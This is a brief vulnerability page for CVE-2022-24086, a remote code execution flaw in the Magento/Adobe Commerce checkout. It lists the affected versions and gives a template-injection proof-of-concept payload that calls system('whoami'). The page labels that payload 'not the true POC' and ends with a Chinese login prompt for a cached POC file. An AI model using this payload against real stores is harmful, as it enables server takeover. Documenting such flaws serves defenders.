CVE-2022-24086 about Magento RCE
# CVE-2022-24086
CVE-2022-24086 about Magento RCE
## Description
Adobe Commerce versions 2.4.3-p1 (and earlier) and 2.3.7-p2 (and earlier) are affected by an improper input validation vulnerability during the checkout process. Exploitation of this issue does not require user interaction and could result in arbitrary code execution.
## POC
> Notice: This Not The True POC ...

> POC
```{{var this.getTemplateFilter().addAfterFilterCallback("system").filter("whoami")}}```
登录后查看神龙缓存的 POC 文件快照
登录查看